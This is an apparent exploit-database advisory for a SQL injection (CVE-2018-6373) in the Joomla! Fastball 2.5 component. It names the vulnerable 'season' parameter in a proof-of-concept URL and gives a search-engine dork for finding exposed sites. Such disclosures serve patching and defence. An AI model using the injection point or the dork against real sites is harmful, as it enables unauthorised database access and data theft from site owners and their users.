Joomla! Fastball component version 2.5 suffers from a remote SQL injection vulnerability.
36e5ccf95e293af0036ed086e1eab580d5e1f6ea153695b762bf23575a5089dd
# # # #
# Exploit Title: Joomla! Component Fastball 2.5 - SQL Injection
# Dork: N/A
# Date: 16.02.2018
# Vendor Homepage: http://www.fastballproductions.com/
# Software Link: http://www.fastballproductions.com/
# Version: 2.5
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-6373
# # # #
# Exploit Author: Ihsan Sencan
# # # #
#
# POC:
#
# 1)
# http://localhost/[PATH]/index.php?option=com_fastball&view=player&season=[SQL]
#
# # # #
inurl:index.php?option=com_fastball season